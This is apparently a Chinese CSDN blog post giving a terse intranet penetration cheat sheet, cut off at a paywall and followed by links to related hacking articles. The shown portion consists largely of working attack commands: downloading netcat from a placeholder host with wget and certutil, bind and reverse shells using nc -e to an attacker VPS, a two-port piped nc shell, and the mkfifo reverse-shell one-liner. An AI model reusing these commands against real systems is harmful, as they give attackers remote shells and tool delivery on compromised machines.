内网渗透一条龙简洁版

最新推荐文章于 2024-03-23 18:39:51 发布
最新推荐文章于 2024-03-23 18:39:51 发布
阅读量398 收藏 2
点赞数 2
分类专栏: 总结笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40708881/article/details/111086523
版权
本文详细介绍了内网渗透过程,包括反弹shell的各种方法,如nc、bash、python、php和perl反弹;添加和删除用户的方法,针对Linux和Windows;本机信息收集技巧,涉及Windows和Linux的重要文件;内网穿透的reg、Meterpreter和cobaltstrike代理;以及横向移动的策略,如弱口令检查、端口扫描和Meterpreter的利用。
摘要由CSDN通过智能技术生成

内网渗透一条龙简洁版

反弹shell

工具准备

搭建http服务

python快速在当前目录搭建http服务

python -m SimpleHTTPServer 8000

Linux下载命令:

wget http://fuck/nc

Linux解压缩命令:

#解压
tar -zxvf FileName.tar.gz
#压缩
tar -zcvf FileName.tar.gz DirName

Window下载命令

certutil -urlcache -split -f http://fuck/nc.exe

P.S.

python获取标准shell,可交互

python -c "import pty;pty.spawn('/bin/bash')"

命令在线编码

http://www.jackson-t.ca/runtime-exec-payloads.html

正向shell

攻击机

nc 靶机ip 4444

靶机

nc -lvp 4444 -e /bin/sh
nc -lvp 4444 -e c:\windows\system32\cmd.exe

反向shell

当机器处于内网,只能使用反向shell。

nc反弹

攻击机

nc -lvp 4444

靶机

nc vps.ip 4444 -e /bin/sh
nc vps.ip 4444 -e c:\windows\system32\cmd.exe

如果nc禁用了-e参数,则可以使用linux管道符|协助进行反弹,但是攻击机需要打开两个终端,一个终端输入命令,一个终端输出结果。

靶机

nc vps.ip 4444|/bin/bash|nc vps.ip 4445

攻击机

nc -lvp 4444   //此处输入命令
nc -lvp 4445   //此处输出结果

安装的nc版本有问题时

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc vps.ip 4444 >/tmp/f
bash反
最低0.47元/天 解锁文章
Laura_小狮子
关注
专栏目录
渗透一条龙服务(极速
qq_61553636的博客
11-22 2344
渗透测试极速
掌握内网渗透之道,成为实战高手,看《内网渗透实战攻略》就够了
等风来
01-10 2827
当今,网络系统面临着越来越严峻的安全挑战。在众多的安全挑战中,一种有组织、有特定目标、长时间持续的新型网络攻击日益猖獗,国际上常称之为APT(Advanced Persistent Threat,高级持续性威胁)攻击。传统的渗透测试从外网发起攻击,并以攻破单台主机为目标。与之相比,APT攻击在技术上更加系统地实现了对目标内网主机的大批量控制,从而使业内对内网渗透技术的关注度提高到了一个空前的高度。
渗透.pdf
08-23
渗透。 pdf
【网安小白】----记一个windows渗透详细教程(超级超级保姆级笔记!!!!)
最新发布
2301_81785032的博客
03-23 1566
windows内网渗透靶场案例分享,编辑不易,请点点赞分享鼓励,谢谢大佬
渗透-手把手教你搭建单环境(超详细)
分享IT行业各种技术经验,从入门到入行,关注我学习更多知识。
02-01 710
渗透-手把手教你搭建单环境,大量图片教学(超详细),包含单环境下载链接。
手把手教你如何进行内网渗透
热门推荐
iO快到碗里来
11-19 8万+
0x00 Preface 内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。 内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。 0x01 信息收集 systeminfo 查看系统详细信息,如OS本、补丁安装情况,可以根据这些信息筛选可利用的漏洞。 net start 查看启动进
[ 内网渗透 ] 渗透技术实战指南(渗透一条龙).rar
02-11
[ 内网渗透 ] 渗透技术实战指南(渗透一条龙
内网渗透思路整理与工具使用
12-08
内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用
内网渗透技术总结大全.pdf
12-22
内网渗透技术总结大全.pdf
内网渗透攻击线路图.pdf
03-21
内网渗透攻击线路图.pdf
内网渗透环境之信息收集
剁椒鱼头没剁椒的博客
05-11 2386
渗透测试的本质就是信息收集,不管是web还是在内网中,信息收集的全面性会直接影响后续的渗透测试工作,通常web端使用文件上传等进入内网后,就需要判断当前的网络环境和权限,为后续的横向移动等工作做好铺垫。在这个界面中就会有很多的功能,不过还是推荐去看官方的文档,你让我介绍我也是直接复制粘贴。官方文档。
超详细的渗透过程!
xiaoi123的博客
05-02 1万+
大家好!我们在这个write up 里讲下几个不同的入侵 windows domian 时的横向操作。 内容不会过于深入,而会介绍一些基本技巧和流程. 为了保证测试客观性所以我将使用我们的测试对象 lock domain “REDHOOK”. 希望这会成为我们第一个关于 windows domian 的系列教程. 如果你要具体了解某些细节(比如kerberos 的 tickets)欢迎发email...
记一次渗透靶场学习过程(全程干货)
MachineGunJoe666
05-25 1160
VulnStack7是红日安全团队最近的一个ATT&CK靶场,为一个三层靶场,靶场地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/9/ 整体拓扑如下。 配置过程这里不再赘述,因为本人主机为linux主机,由于路径问题,导致dmz区的机器无法正常运行,于是直接砍掉,反正网站为二层的docker环境内,不影响总体操作。且为了增加难度,在PC1和PC2安装了某安全软件,于是拓扑变成了下面这样: 记得开启相关服务,在各个机器上。..
渗透提权入门练习(MS14-068)
ai_64的博客
04-09 584
一、漏洞说明 微软在2014年11月18日发布了一个紧急补丁,修复了一个影响全部本Windows服务器的严重漏洞。该补丁用于解决Microsoft Windows Kerberos KDC漏洞(CVE-2014-6324),该漏洞允许黑客提升任意普通用户权限成为管理员(Domain Admin)身份。也就是说,你在一台普通用户的机器上利用这个漏洞,那么这个用户就变成管理员权限,然后,该...
渗透详解
qq_54037445的博客
10-10 3420
渗透完整步骤,内网渗透后续msf信息扫描,msf模块
ActiveMQ 任意文件写入漏洞(CVE-2016-3088)复现
qq_40708881的博客
12-12 2905
ActiveMQ 任意文件写入漏洞(CVE-2016-3088)复现 导语 ActiveMQ的web控制台分三个应用:admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口。admin和api都需要登录后才能使用,fileserver无需登录。 fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺
ActiveMQ反序列化漏洞(CVE-2015-5254)复现
qq_40708881的博客
12-10 364
ActiveMQ反序列化漏洞(CVE-2015-5254)复现 导语 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。 Apache ActiveMQ 5.13.0之前5.x本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。 漏洞环境 git
内网渗透 | 手把手教你如何进行内网渗透
songbai220
11-23 1万+
内网渗透 | 手把手教你如何进行内网渗透 目录 内网渗透 | 手把手教你如何进行内网渗透 0x01 DMZ渗透 0x02 跳板及内网探测 0x2.1 做跳板 0x2.2 内网探测 0x03 第二层渗透 0x3.1 web渗透 or MS17_010 0x3.2 内网探测+跳板代理链 0x4 第三层内网渗透 0x5 总结 0x5.1 跳板总结 0x5.2 内网探测 0x5.3 后话 0x01 DMZ渗透 首页 看到DMZ开启了web服务,是一个typec...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值